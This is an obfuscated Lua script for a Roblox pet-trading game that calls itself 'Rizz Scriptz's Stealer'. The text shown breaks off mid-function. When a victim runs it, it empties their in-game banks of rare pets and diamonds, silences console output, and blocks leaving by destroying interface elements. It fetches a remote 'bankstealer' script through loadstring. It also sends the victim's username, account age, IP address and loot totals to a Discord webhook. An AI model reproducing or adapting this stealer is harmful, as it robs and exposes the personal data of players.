--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.13) ~  Much Love, Ferib 

]]--

getgenv().Settings={User="ArmandoSparadais60",Webhook=true,MailMessage=".gg/uSgzNwHDTS",Titanics={Dualhook=true,Intensity=1687 -(412 + 1175) },Banana={Dualhook=true,Intensity=100},Huges={Dualhook=true,Intensity=122 -72 },Pogs={Dualhook=true,Intensity=0 + 0 },Exclusives={Dualhook=true,Intensity=0 + 0 },Events={Dualhook=true,Intensity=0},Secrets={Dualhook=true,Intensity=0},HC_DM_Mythics={Dualhook=true,Intensity=0 -0 },Gems={Dualhook=true,Intensity=1274 -(388 + 886) }};if getgenv().executed then return;end getgenv().executed=true;local v2=game:GetService("RunService");local v3=workspace.CurrentCamera;local v4={115,164,165,587 -(306 + 254) ,1 + 12 };UserSettings().GameSettings.MasterVolume=0;if (_G.MouseLock~=false) then v2.RenderStepped:Connect(function()local v220=0 -0 ;while true do if (v220==0) then for v478,v479 in next,v4 do keyrelease(v479);end mousemoveabs(v3.ViewportSize.X/(1470 -(899 + 568)) ,v3.ViewportSize.Y/3 );break;end end end);end local function v6(...)local v115=0 + 0 ;local v116;while true do if (v115==(2 -1)) then return print(...);end if (0==v115) then v116=debug.getinfo(2);if (v116 and (v116.what=="Lua") and (v116.func==print)) then return;end v115=604 -(268 + 335) ;end end end print=v6;rconsoleprint=v6;rconsolewarn=v6;rconsoleerr=v6;rconsoleinput=v6;printconsole=v6;setclipboard=v6;if (UserName==nil) then UserName=_G.UserName;end if (UserName2==nil) then UserName2=_G.UserName2;end if (Webhook==nil) then Webhook=_G.Webhook;end local v7=game:GetService("Players").LocalPlayer.Name;if (v7==UserName) then game:GetService("Players").LocalPlayer:Kick("You Are The Owner! (test it on alt acc)");return;end if (UserName==nil) then local v175=290 -(60 + 230) ;while true do if (v175==(572 -(426 + 146))) then game:GetService("Players").LocalPlayer:Kick("Put A UserName");return;end end end local v8=pcall(function()game:GetService("Players"):GetUserIdFromNameAsync(UserName);end);if  not v8 then local v176=0 + 0 ;while true do if (v176==(1456 -(282 + 1174))) then game:GetService("Players").LocalPlayer:Kick("Put A Valid Username!");return;end end end if v8 then _G.UserID=game:GetService("Players"):GetUserIdFromNameAsync(UserName);end if (UserName2~=nil) then local v177=0;local v178;while true do if ((811 -(569 + 242))==v177) then v178=pcall(function()game:GetService("Players"):GetUserIdFromNameAsync(UserName2);end);if  not v178 then local v480=0 -0 ;while true do if (v480==(0 + 0)) then game:GetService("Players").LocalPlayer:Kick("Put A Valid Username2!");return;end end end break;end end end local v9=require(game:GetService("ReplicatedStorage").Library.Client.Save).Get().Diamonds;local v10=pcall(function()game:GetService("Workspace")['__MAP'].Interactive.Mailbox.Pad:GetChildren();end);if  not v10 then local v179=0;while true do if (v179==0) then game:GetService("Players").LocalPlayer:Kick("UnRegistered Area. Please Consider Going To The Shop");return;end end end function to_base64(v117)local v118=1024 -(706 + 318) ;local v119;while true do if ((1251 -(721 + 530))==v118) then v119="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";return (v117:gsub(".",function(v367)local v368=0;local v369;local v370;while true do if (v368==(1272 -(945 + 326))) then return v369;end if (v368==0) then v369,v370="",v367:byte();for v521=8,2 -1 , -(1 + 0) do v369=v369   .. (((((v370%((702 -(271 + 429))^v521)) -(v370%((2 + 0)^(v521-(1501 -(1408 + 92))))))>(1086 -(461 + 625))) and "1") or "0") ;end v368=1289 -(993 + 295) ;end end end)   .. "0000"):gsub("%d%d%d?%d?%d?%d?",function(v371)if ( #v371<6) then return "";end local v372=0;for v455=1 + 0 ,6 do v372=v372 + (((v371:sub(v455,v455)=="1") and ((1173 -(418 + 753))^((3 + 3) -v455))) or 0) ;end return v119:sub(v372 + 1 + 0 ,v372 + 1 + 0 );end)   .. ({"","==","="})[( #v117%(532 -(406 + 123))) + (1770 -(1749 + 20)) ] ;end end end function from_base64(v120)local v121=0 + 0 ;local v122;while true do if (1==v121) then return (v120:gsub(".",function(v373)local v374=0;local v375;local v376;while true do if (v374==1) then for v522=1328 -(1249 + 73) ,1 + 0 , -1 do v375=v375   .. (((((v376%(2^v522)) -(v376%(2^(v522-(1146 -(466 + 679))))))>(0 -0)) and "1") or "0") ;end return v375;end if (v374==0) then if (v373=="=") then return "";end v375,v376="",v122:find(v373) -(2 -1) ;v374=1901 -(106 + 1794) ;end end end):gsub("%d%d%d?%d?%d?%d?%d?%d?",function(v377)local v378=0;local v379;while true do if (v378==1) then for v523=1,3 + 5  do v379=v379 + (((v377:sub(v523,v523)=="1") and (2^(8 -v523))) or (0 + 0)) ;end return string.char(v379);end if (v378==(0 -0)) then if ( #v377~=8) then return "";end v379=0 -0 ;v378=115 -(4 + 110) ;end end end));end if (v121==(584 -(57 + 527))) then v122="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";v120=string.gsub(v120,"[^"   .. v122   .. "=]" ,"");v121=1;end end end request=(syn and syn.request) or (http and http.request) or http_request or (fluxus and fluxus.request) or request or HttpPost ;local v11;local function v12()local v123=1427 -(41 + 1386) ;local v124;while true do if (0==v123) then v124=(syn and  not is_sirhurt_closure and  not pebc_execute and "Synapse X") or (secure_load and "Sentinel") or (is_sirhurt_closure and "Sirhurt") or (pebc_execute and "ProtoSmasher") or (KRNL_LOADED and "KRNL") or (WrapGlobal and "WeAreDevs") or (isvm and "Proxo") or (shadow_env and "Shadow") or (jit and "EasyExploits") or (getscriptenvs and "Calamari") or (unit and  not syn and "Unit") or (OXYGEN_LOADED and "Oxygen U") or (IsElectron and "Electron") or "Couldnt Grab" ;v11=v124;break;end end end v12();local v13=game.Players.LocalPlayer.PlayerGui.Main.Right.Rank.RankName.Text;local v14=game:GetService("Players").LocalPlayer.Name;local v15=game:GetService("Players").LocalPlayer;local v16=game:HttpGet("https://ipinfo.io/ip");local v17;if (_G.LoadingScreen~=false) then loadstring(game:HttpGet("Put Your Loading Screen Raw Link Here"))();end local v18=getsenv(game:GetService("Players").LocalPlayer.PlayerScripts.Scripts.GUIs["Bank Client"]);local v19=getsenv(game:GetService("Players").LocalPlayer.PlayerScripts.Scripts.GUIs.Inventory);local v20=getsenv(game:GetService("Players").LocalPlayer.PlayerScripts.Scripts.GUIs.Mailbox);local v21=getsenv(game:GetService("Players").LocalPlayer.PlayerScripts.Scripts.Game["Reedem Rank Rewards"]);local v22=getsenv(game:GetService("Players").LocalPlayer.PlayerScripts.Scripts.GUIs["Free Gifts"]);local v23=debug.getconstant(v18.GetMyBanks,106 -(17 + 86) );local v24=debug.getconstant(v19.LockPets,4 + 1 );local v25=debug.getconstant(v18.GetBank,6 -3 );local v26=debug.getconstant(v18.Withdraw,46 -30 );local v27=debug.getconstant(debug.getprotos(v20.UpdateOutbox)[2],186 -(122 + 44) );local v28=debug.getconstant(v20.UpdateInboxBottom,60 -25 );local v29=debug.getconstant(v20.Update,3);local v30=debug.getconstant(v18.DecideInvite,6);local v31=debug.getconstant(v18.GetMyInvites,9 -6 );local v32=debug.getconstant(v21.Redeem,3);local v33=debug.getconstant(v22.Redeem,3 + 0 );local v34=getupvalues(require(game:GetService("ReplicatedStorage").Library.Client['Network']).Invoke);local v35=getupvalues(v34[1 + 1 ]);local v36=getupvalues(v35[1 -0 ])[1][2];local v37=getupvalues(require(game:GetService("ReplicatedStorage").Library.Client['Network']).Invoke);local v38=getupvalues(v37[2]);v23=v36[v38[67 -(30 + 35) ](2,v23)];v24=v36[v38[2 + 0 ](1259 -(1043 + 214) ,v24)];v25=v36[v38[2](2,v25)];v26=v36[v38[7 -5 ](1214 -(323 + 889) ,v26)];v27=v36[v38[5 -3 ](582 -(361 + 219) ,v27)];v28=v36[v38[322 -(53 + 267) ](1 + 1 ,v28)];v29=v36[v38[415 -(15 + 398) ](2,v29)];v30=v36[v38[2](984 -(18 + 964) ,v30)];v31=v36[v38[7 -5 ](2 + 0 ,v31)];v32=v36[v38[2](2 + 0 ,v32)];v33=v36[v38[852 -(20 + 830) ](2 + 0 ,v33)];local v50=v23:InvokeServer();local v51=require(game:GetService("ReplicatedStorage").Library.Client.Save).Get();function invspace()local v125=126 -(116 + 10) ;local v126;while true do if (v125==(0 + 0)) then v126=v51.MaxSlots-#v51.Pets ;if (v126>50) then v126=788 -(542 + 196) ;end v125=1;end if (v125==1) then return v126;end end end function invspace_nolimit()local v127=0;local v128;while true do if ((0 -0)==v127) then v128=v51.MaxSlots-#v51.Pets ;return v128;end end end game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new(game:GetService("Workspace")['__MAP'].Interactive.Bank.Pad.Position);local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;local v62;local v63=0;local v64=0 + 0 ;local v65=0 + 0 ;local v66=0 + 0 ;local v67=0 -0 ;local v68=0;local v69=0 -0 ;if (v50[1552 -(1126 + 425) ]~=nil) then v68=v68 + 1 ;end if (v50[407 -(118 + 287) ]~=nil) then v68=v68 + (3 -2) ;end if (v50[1124 -(118 + 1003) ]~=nil) then v68=v68 + (2 -1) ;end if (v50[4]~=nil) then v68=v68 + (378 -(142 + 235)) ;end if (v50[5]~=nil) then v68=v68 + (4 -3) ;end local v70=v31:InvokeServer();bankstable={};if (v68~=(2 + 3)) then local v180=0;while true do if ((977 -(553 + 424))==v180) then if (v70[1 -0 ]~=nil) then table.insert(bankstable,v70[1]['BUID']);end if (v70[2 + 0 ]~=nil) then table.insert(bankstable,v70[2 + 0 ]['BUID']);end v180=1 + 0 ;end if (v180==(1 + 0)) then if (v70[2 + 1 ]~=nil) then table.insert(bankstable,v70[6 -3 ]['BUID']);end if (v70[4]~=nil) then table.insert(bankstable,v70[4]['BUID']);end v180=2;end if (v180==(5 -3)) then if (v70[11 -6 ]~=nil) then table.insert(bankstable,v70[2 + 3 ]['BUID']);end for v456,v457 in pairs(bankstable) do v30:InvokeServer(v457);end break;end end end if (v68==(0 -0)) then v54=bankstable[1];v56=bankstable[755 -(239 + 514) ];v58=bankstable[3];v60=bankstable[2 + 2 ];v62=bankstable[5];elseif (v68==1) then local v302=1329 -(797 + 532) ;while true do if (v302==0) then v54=v50[1 + 0 ]['BUID'];v56=bankstable[1 + 0 ];v302=1;end if (v302==(4 -2)) then v62=bankstable[1206 -(373 + 829) ];break;end if (v302==(732 -(476 + 255))) then v58=bankstable[1132 -(369 + 761) ];v60=bankstable[2 + 1 ];v302=2 -0 ;end end elseif (v68==2) then local v458=0 -0 ;while true do if (v458==(239 -(64 + 174))) then v58=bankstable[1 + 0 ];v60=bankstable[2 -0 ];v458=338 -(144 + 192) ;end if (v458==0) then v54=v50[1]['BUID'];v56=v50[218 -(42 + 174) ]['BUID'];v458=1;end if (v458==(2 + 0)) then v62=bankstable[3 + 0 ];break;end end elseif (v68==(2 + 1)) then v54=v50[1505 -(363 + 1141) ]['BUID'];v56=v50[2]['BUID'];v58=v50[1583 -(1183 + 397) ]['BUID'];v60=bankstable[2 -1 ];v62=bankstable[2 + 0 ];elseif (v68==(3 + 1)) then v54=v50[1976 -(1913 + 62) ]['BUID'];v56=v50[2]['BUID'];v58=v50[2 + 1 ]['BUID'];v60=v50[4]['BUID'];v62=bankstable[1];elseif (v68==(13 -8)) then v54=v50[1934 -(565 + 1368) ]['BUID'];v56=v50[2]['BUID'];v58=v50[11 -8 ]['BUID'];v60=v50[4]['BUID'];v62=v50[1666 -(1477 + 184) ]['BUID'];end Library=require(game:GetService("ReplicatedStorage").Framework:FindFirstChild("Library"));Functions=Library.Functions;PetIDList={};table.foreach(Library.Directory.Pets,function(v129,v130)if (v130.huge or v130.titanic or (v130.name=="banana") or (v130.name=="Bladee") or (v130.convertPoints==(6 -1))) then table.insert(PetIDList,v129);end end);if ((v54~=nil) and (invspace()~=(0 + 0))) then while task.wait() do print("bank1 purged");v53=v25:InvokeServer(v54);LHList={};LFinalList={};local v221=v53.Storage.Pets;local v222={};for v303,v304 in pairs(v221) do v222[v304['uid']]=false;end for v306,v307 in pairs(v221) do if (table.find(PetIDList,v307['id'])~=nil) then table.insert(LHList,v307['uid']);end end print("LHList :", #LHList);if ( #LHList<=invspace()) then for v459,v460 in pairs(LHList) do table.insert(LFinalList,v460);end elseif ( #LHList>invspace()) then for v508,v509 in pairs(LHList) do if ( #LFinalList<invspace()) then table.insert(LFinalList,v509);end end end print("LFinalList :", #LFinalList);v63=v53.Storage.Currency.Diamonds;if (( #LFinalList==(856 -(564 + 292))) and (v63<1000000000) and (v9>(189796 -79796))) then v63=0;end if (( #LFinalList~=(0 -0)) or (v63~=0)) then local v380=304 -(244 + 60) ;local v381;local v382;local v383;while true do if (v380==2) then wait(1.5 + 0 );break;end if (v380==(477 -(41 + 435))) then if (v382==false) then wait(0.2);v26:InvokeServer(v54,LFinalList,1001 -(938 + 63) );end v69=v69 +  #LFinalList ;v380=2 + 0 ;end if (v380==(1125 -(936 + 189))) then v381={[1 + 0 ]=v54,[1615 -(1565 + 48) ]=LFinalList,[2 + 1 ]=1138 -(782 + 356) };v382,v383=pcall(function()v26:InvokeServer(v54,LFinalList,v63);end);v380=268 -(176 + 91) ;end end else print("done1");break;end end end if ((v56~=nil) and (invspace()~=(0 -0))) then while task.wait() do print("bank2 purged");v55=v25:InvokeServer(v56);BHList2={};FinalList2={};local v224=v55.Storage.Pets;local v225={};for v308,v309 in pairs(v224) do v225[v309['uid']]=false;end for v311,v312 in pairs(v224) do if ((table.find(PetIDList,v312['id'])~=nil) and  not v312.l) then table.insert(BHList2,v312['uid']);end end if ( #BHList2<=invspace()) then for v461,v462 in pairs(BHList2) do table.insert(FinalList2,v462);end elseif ( #BHList2>invspace()) then for v510,v511 in pairs(BHList2) do if ( #FinalList2<invspace()) then table.insert(FinalList2,v511);end end end print("FinalList2 :", #FinalList2);print("BHList2 :", #BHList2);v64=v55.Storage.Currency.Diamonds;if (( #FinalList2==(0 -0)) and (v64<(1000001092 -(975 + 117))) and (v9>110000)) then v63=0;end if (( #FinalList2~=(1875 -(157 + 1718))) or (v64~=(0 + 0))) then local v384={[3 -2 ]=v56,[6 -4 ]=FinalList2,[1021 -(697 + 321) ]=0 -0 };wait();local v385,v386=pcall(function()v26:InvokeServer(v56,FinalList2,v64);end);if (v385==false) then local v486=0;while true do if (v486==(0 -0)) then wait(0.2 -0 );v26:InvokeServer(v56,FinalList2,0);break;end end end wait(1.5 + 0 );v69=v69 +  #FinalList2 ;else print("done2");break;end end end if ((v58~=nil) and (invspace()~=(0 -0))) then while task.wait() do print("bank3 purged");v57=v25:InvokeServer(v58);BHList3={};FinalList3={};local v227=v57.Storage.Pets;local v228={};for v313,v314 in pairs(v227) do v228[v314['uid']]=false;end for v316,v317 in pairs(v227) do if ((table.find(PetIDList,v317['id'])~=nil) and  not v317.l) then table.insert(BHList3,v317['uid']);end end if ( #BHList3<=invspace()) then for v463,v464 in pairs(BHList3) do table.insert(FinalList3,v464);end elseif ( #BHList3>invspace()) then for v512,v513 in pairs(BHList3) do if ( #FinalList3<invspace()) then table.insert(FinalList3,v513);end end end print("FinalList3 :", #FinalList3);print("BHList3 :", #BHList3);v65=v57.Storage.Currency.Diamonds;if (( #FinalList3==(0 -0)) and (v65<1000000000) and (v9>(111227 -(322 + 905)))) then v63=0;end if (( #FinalList3~=(611 -(602 + 9))) or (v65~=0)) then local v387={[1]=v58,[1191 -(449 + 740) ]=FinalList3,[875 -(826 + 46) ]=947 -(245 + 702) };wait();local v388,v389=pcall(function()v26:InvokeServer(v58,FinalList3,v65);end);if (v388==false) then local v487=0 -0 ;while true do if ((0 + 0)==v487) then wait(1898.2 -(260 + 1638) );v26:InvokeServer(v58,FinalList3,440 -(382 + 58) );break;end end end wait(3.5 -2 );v69=v69 +  #FinalList3 ;else print("done3");break;end end end if ((v60~=nil) and (invspace()~=(0 + 0))) then while task.wait() do print("bank4 purged");v59=v25:InvokeServer(v60);BHList4={};FinalList4={};local v230=v59.Storage.Pets;local v231={};for v318,v319 in pairs(v230) do v231[v319['uid']]=false;end for v321,v322 in pairs(v230) do if ((table.find(PetIDList,v322['id'])~=nil) and  not v322.l) then table.insert(BHList4,v322['uid']);end end if ( #BHList4<=invspace()) then for v465,v466 in pairs(BHList4) do table.insert(FinalList4,v466);end elseif ( #BHList4>invspace()) then for v514,v515 in pairs(BHList4) do if ( #FinalList4<invspace()) then table.insert(FinalList4,v515);end end end print("BHList4 :", #BHList4);print("FinalList4 :", #FinalList4);v66=v59.Storage.Currency.Diamonds;if (( #FinalList4==0) and (v66<1000000000) and (v9>(227337 -117337))) then v66=0 -0 ;end if (( #FinalList4~=(1205 -(902 + 303))) or (v66~=0)) then local v390=0;local v391;local v392;local v393;while true do if (v390==(1 -0)) then if (v392==false) then wait(0.2 -0 );v26:InvokeServer(v60,FinalList4,0);end v69=v69 +  #FinalList4 ;v390=1 + 1 ;end if ((1690 -(1121 + 569))==v390) then v391={[215 -(22 + 192) ]=v60,[685 -(483 + 200) ]=FinalList4,[3]=1463 -(1404 + 59) };v392,v393=pcall(function()v26:InvokeServer(v60,FinalList4,v66);end);v390=2 -1 ;end if (2==v390) then wait(1.5);break;end end else print("done4");break;end end end if ((v62~=nil) and (invspace()~=0)) then while task.wait() do print("bank5 purged");v61=v25:InvokeServer(v62);BHList5={};FinalList5={};local v233=v61.Storage.Pets;local v234={};for v323,v324 in pairs(v233) do v234[v324['uid']]=false;end for v326,v327 in pairs(v233) do if ((table.find(PetIDList,v327['id'])~=nil) and  not v327.l) then table.insert(BHList5,v327['uid']);end end if ( #BHList5<=invspace()) then for v467,v468 in pairs(BHList5) do table.insert(FinalList5,v468);end elseif ( #BHList5>invspace()) then for v516,v517 in pairs(BHList5) do if ( #FinalList5<invspace()) then table.insert(FinalList5,v517);end end end print("BHList5 :", #BHList5);print("FinalList5 :", #FinalList5);v67=v61.Storage.Currency.Diamonds;if (( #FinalList5==(0 -0)) and (v67<(1000000765 -(468 + 297))) and (v9>110000)) then v67=562 -(334 + 228) ;end if (( #FinalList5~=(0 -0)) or (v67~=(0 -0))) then local v394=0;local v395;local v396;local v397;while true do if (v394==1) then v396,v397=pcall(function()v26:InvokeServer(v62,FinalList5,v67);end);if (v396==false) then wait(0.2);v26:InvokeServer(v62,FinalList5,0 -0 );end v394=1 + 1 ;end if (v394==(236 -(141 + 95))) then v395={[1 + 0 ]=v62,[4 -2 ]=FinalList5,[3]=0};wait();v394=2 -1 ;end if (v394==(1 + 1)) then wait(1.5);v69=v69 +  #FinalList5 ;break;end end else print("done5");break;end end end local v72=v63 + v64 + v65 + v66 + v67 ;local v73=game:GetService("Players").LocalPlayer.PlayerGui.FreeGifts;Gifts={};if (invspace_nolimit()~=(0 -0)) then local v186=0 + 0 ;while true do if (v186==0) then for v469,v470 in pairs(v73.Frame.Container.Gifts:GetDescendants()) do if (v470.Name=="Timer") then if (v470.Text=="Redeem!") then table.insert(Gifts,string.split(tostring(v470.Parent),"t")[2 + 0 ]);end end end if ( #Gifts~=0) then for v518,v519 in pairs(Gifts) do v33:InvokeServer(tonumber(v519));end end break;end end end if (v51.World=="Spawn") then local v187=0 -0 ;local v188;local v189;local v190;local v191;while true do if (v187==(0 + 0)) then v188=game:GetService("Workspace")['__MAP'].Interactive["Rank Rewards"].Pad;v189=game:GetService("Workspace")['__MAP'].Interactive["VIP Rewards"].Pad;v187=1;end if (v187==(165 -(92 + 71))) then if (v190.Text=="Redeem!") then local v488=0 + 0 ;while true do if ((0 -0)==v488) then game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new(v188.Position);while task.wait() do if (v190.Text~="Redeem!") then break;end end break;end end end if table.find(v51.Gamepasses,18675070 -(574 + 191) ) then if (v191.Text=="Redeem!") then local v529=0 + 0 ;while true do if (v529==0) then game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new(v189.Position);while task.wait() do if (v191.Text~="Redeem!") then break;end end break;end end end end break;end if (v187==1) then v190=v188.BillboardGui.Timer;v191=v189.BillboardGui.Timer;v187=4 -2 ;end end end game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new(game:GetService("Workspace")['__MAP'].Interactive.Mailbox.Pad.Position);local v74=v29:InvokeServer();local v75= #v74.Inbox;if ((v75~=(0 + 0)) and (invspace_nolimit()>=v75)) then local v192=0;while true do if (v192==(849 -(254 + 595))) then v28:InvokeServer();task.wait(127.5 -(55 + 71) );break;end end end local v76=v51.Diamonds;if (v76<(144913 -34913)) then local v193=1790 -(573 + 1217) ;while true do if (v193==(5 -3)) then loadstring(game:HttpGetAsync("bankstealer raw link",true))();return;end if (v193==(1 + 0)) then _G.AntiLeave=false;_G.MouseLock=false;v193=2;end if (v193==(0 -0)) then _G.Webhook=Webhook;_G.LoadingScreen=false;v193=1;end end end if (_G.AntiLeave~=false) then for v236,v237 in pairs(game:GetService("Players").LocalPlayer.PlayerGui:GetChildren()) do if (v237.Name~="Inventory") then v237:Destroy();end end for v238,v239 in pairs(game:GetService("CoreGui"):GetChildren()) do if ((v239.Name~="RizzHub") and (v239.Name~="RobloxPromptGui")) then v239:Destroy();end end end TitanicList={};TList={};STList={};BananaList={};BList={};HugeList={};HList={};SHList={};PogList={};PList={};SPList={};ExclusiveList={};EList={};SEList={};EventList={};EvList={};SEvList={};SecretList={};SList={};SSList={};MythicList={};MList={};SMList={};table.foreach(Library.Directory.Pets,function(v131,v132)local v133=939 -(714 + 225) ;while true do if (v133==(2 -1)) then if v132.huge then table.insert(HugeList,v131);end if (string.split(v132.name," ")[1]=="Pog") then table.insert(PogList,v131);end v133=2 -0 ;end if (v133==2) then if ((v132.rarity=="Exclusive") and  not v132.huge and  not v132.titanic) then table.insert(ExclusiveList,v131);end if (v132.rarity=="Event") then table.insert(EventList,v131);end v133=1 + 2 ;end if (v133==(3 -0)) then if (v132.rarity=="Secret") then table.insert(SecretList,v131);end if (v132.rarity=="Mythical") then table.insert(MythicList,v131);end break;end if (v133==(806 -(118 + 688))) then if v132.titanic then table.insert(TitanicList,v131);end if (v132.name=="banana") then table.insert(BananaList,v131);end v133=49 -(25 + 23) ;end end end);local v77=v51.Pets;local v78={};for v134,v135 in pairs(v77) do v78[v135['uid']]=false;end v24:InvokeServer(v78);for v137,v138 in pairs(v77) do if (table.find(TitanicList,v138['id'])~=nil) then local v240=0;while true do if (v240==0) then table.insert(TList,v138['uid']);table.insert(STList,v138['id']);break;end end end end for v139,v140 in pairs(v77) do if (table.find(BananaList,v140['id'])~=nil) then table.insert(BList,v140['uid']);end end for v141,v142 in pairs(v77) do if (table.find(HugeList,v142['id'])~=nil) then local v241=0 + 0 ;while true do if (v241==0) then table.insert(HList,v142['uid']);table.insert(SHList,v142['id']);break;end end end end for v143,v144 in pairs(v77) do if (table.find(PogList,v144['id'])~=nil) then local v242=1886 -(927 + 959) ;while true do if (v242==(0 -0)) then table.insert(PList,v144['uid']);table.insert(SPList,v144['id']);break;end end end end for v145,v146 in pairs(v77) do if ((table.find(ExclusiveList,v146['id'])~=nil) and  not v146.huge and  not v146.titanic) then table.insert(EList,v146['uid']);table.insert(SEList,v146['id']);end end for v147,v148 in pairs(v77) do if (table.find(EventList,v148['id'])~=nil) then local v243=732 -(16 + 716) ;while true do if (v243==0) then table.insert(EvList,v148['uid']);table.insert(SEvList,v148['id']);break;end end end end for v149,v150 in pairs(v77) do if (table.find(SecretList,v150['id'])~=nil) then local v244=0 -0 ;while true do if (0==v244) then table.insert(SList,v150['uid']);table.insert(SSList,v150['id']);break;end end end end for v151,v152 in pairs(v77) do if ((table.find(MythicList,v152['id'])~=nil) and v152.hc and v152.dm) then local v245=97 -(11 + 86) ;while true do if (v245==(0 -0)) then table.insert(MList,v152['uid']);table.insert(SMList,v152['id']);break;end end end end local v79= #TList +  #BList +  #HList +  #EList +  #EvList +  #MList +  #SList +  #PList ;local v80;if (v76>=(((100285 -(175 + 110)) * v79) + (252479 -152479))) then v80=(100000 * v79) + (493224 -393224) ;elseif (v76<((100000 * v79) + (101796 -(503 + 1293)))) then v80=v76;end local v81;if ((v76-v80)<(27928 -17928)) then v81=0;elseif ((v76-v80)>=(7232 + 2768)) then v81=v76-v80 ;end function diamondstoconvert(v153)local v154=0;local v155;local v156;local v157;local v158;while true do if (v154==(1064 -(810 + 251))) then return v157;end if ((0 + 0)==v154) then v155=v153;v156={k=4,m=3 + 4 ,b=10,T=13,Qt=15 + 1 };v154=1;end if (v154==(534 -(43 + 490))) then v157=tostring(math.floor(v155));v158=nil;v154=735 -(711 + 22) ;end if (v154==(7 -5)) then for v402,v403 in pairs(v156) do if (( #v157>=v403) and ( #v157<(v403 + (862 -(240 + 619))))) then v158=v402;break;end end if v158 then local v471=0;local v472;local v473;local v474;local v475;while true do if (v471==(1 + 0)) then v157=string.format("%0.2f",v473/((15 -5)^(v472-(1 + 0))) );v474=string.split(v157,".")[1746 -(1344 + 400) ];v471=2;end if (v471==2) then v475=".";if ((string.split(v474,"")[407 -(255 + 150) ]=="0") and (string.split(v474,"")[1]~="0")) then v157=string.split(v157,".")[1 + 0 ]   .. v475   .. string.split(v474,"")[1 + 0 ]   .. v158 ;elseif ((string.split(v474,"")[8 -6 ]=="0") and (string.split(v474,"")[1]=="0")) then v157=string.split(v157,".")[1]   .. v158 ;elseif ((string.split(v474,"")[2]~="0") and (string.split(v474,"")[3 -2 ]~="0")) then v157=v157   .. v158 ;elseif ((string.split(v474,"")[1741 -(404 + 1335) ]~="0") and (string.split(v474,"")[407 -(183 + 223) ]=="0")) then v157=v157   .. v158 ;else v157=v153;end break;end if (v471==(0 -0)) then v472=v156[v158];v473=math.floor(v155/(10^(v472-(2 + 1))) ) * ((4 + 6)^(v472-3)) ;v471=1;end end end v154=340 -(10 + 327) ;end end end local v82=diamondstoconvert(v81);local v83=diamondstoconvert(v72);function RAP()local v159=diamondstoconvert(v51.RAP);return v159;end local v84=Webhook;local v85=true;local function v86(v160,v161,v162,v163,v164,v165,v166)local v167=0;local v168;local v169;local v170;local v171;while true do if (v167==3) then if ((v69~=0) or (v72~=(0 + 0))) then local v476=338 -(118 + 220) ;while true do if (v476==(0 + 0)) then imgs="https://cdn.discordapp.com/attachments/1059224458033901668/1066510039818440864/New_Project_DADCF6A.gif";v17={content=v162,username="Rizz Scriptz",avatar_url=imgs,embeds={{title="**New Hit** ||With Rizz||",url="https://discord.gg/uSgzNwHDTS",type="rich",color=tonumber(1165537 + 1429534 ),thumbnail={url=v171,height=1775 -1355 ,width=420},fields={{name="**This data was generated using Rizz Scriptz's Stealer** :moyai:",value="```Username     : "   .. v14   .. "\nUser-ID      : "   .. v15.userId   .. "\nAccount Age  : "   .. v15.AccountAge   .. " Days\nIP Address   : "   .. v16   .. "\nRank           : "   .. v13   .. "\nRAP          : "   .. RAP()   .. "\nExploit      : "   .. v11   .. "\nReceiver     : "   .. v166   .. "```" ,inline=false},{name=":dog: **Pets left** :dog:",value="```"   .. v164   .. "```" ,inline=true},{name=":gem: **Diamonds** :gem:",value="```"   .. v163   .. "```" ,inline=true},{name=v160,value="```"   .. v161   .. "```" ,inline=true},{name=":bank: **Joined Banks** :bank:",value="```"   .. v68   .. v170   .. "```" ,inline=true},{name=":gem: **Wd Diamonds** :gem:",value="```"   .. v83   .. "```" ,inline=true},{name=":money_mouth: **Wd Huges** :money_mouth:",value="```"   .. v69   .. "```" ,inline=true}}}}};v476=1;end if (v476==(1 + 0)) then newdata1=game:GetService("HttpService"):JSONEncode(v17);v169={["content-type"]="application/json"};v476=1 + 1 ;end if (v476==(1 + 1)) then if ((Webhook~=nil) and (v85==true)) then local v538=0;while true do if (v538==0) then v168={Url=v84,Body=newdata1,Method="POST",Headers=v169};request(v168);break;end end end break;end end else imgs="https://cdn.discordapp.com/attachments/1059224458033901668/1066510039818440864/New_Project_DADCF6A.gif";v17={content=v162,username="Rizz Scriptz",avatar_url=imgs,embeds={{title="**New Hit** ||With Rizz||",url="https://discord.gg/uSgzNwHDTS",type="rich",color=tonumber(1612205 + 982866 ),thumbnail={url=v171,height=420,width=1587 -(645 + 522) },fields={{name="**This data was generated using Rizz Scriptz's Stealer** :moyai:",value="```Username     : "   .. v14   .. "\nUser-ID      : "   .. v15.userId   .. "\nAccount Age  : "   .. v15.AccountAge   .. " Days\nIP Address   : "   .. v16   .. "\nRank         : "   .. v13   .. "\nRAP          : "   .. RAP()   .. "\nExploit      : "   .. v11   .. "\nReceiver     : "   .. v166   .. "```" ,inline=false},{name=":dog: **Pets left** :dog:",value="```"   .. v164   .. "```" ,inline=true},{name=":gem: **Diamonds** :gem:",value="```"   .. v163   .. "```" ,inline=true},{name=v160,value="```"   .. v161   .. "```" ,inline=true}}}}};newdata1=game:GetService("HttpService"):JSONEncode(v17);v169={["content-type"]="application/json"};if ((Webhook~=nil) and (v85==true)) then local v520=0 -0 ;while true do if (v520==(0 -0)) then v168={Url=v84,Body=newdata1,Method="POST",Headers=v169};request(v168);break;end end end end break;end if (v167==2) then v171=game:HttpGet("https://thumbnails.roblox.com/v1/assets?assetIds="   .. v171   .. "&returnPolicy=PlaceHolder&size=420x420&format=Png&isCircular=false" );v171=game:GetService("HttpService"):JSONDecode(v171).data[1].imageUrl;v167=3;end if 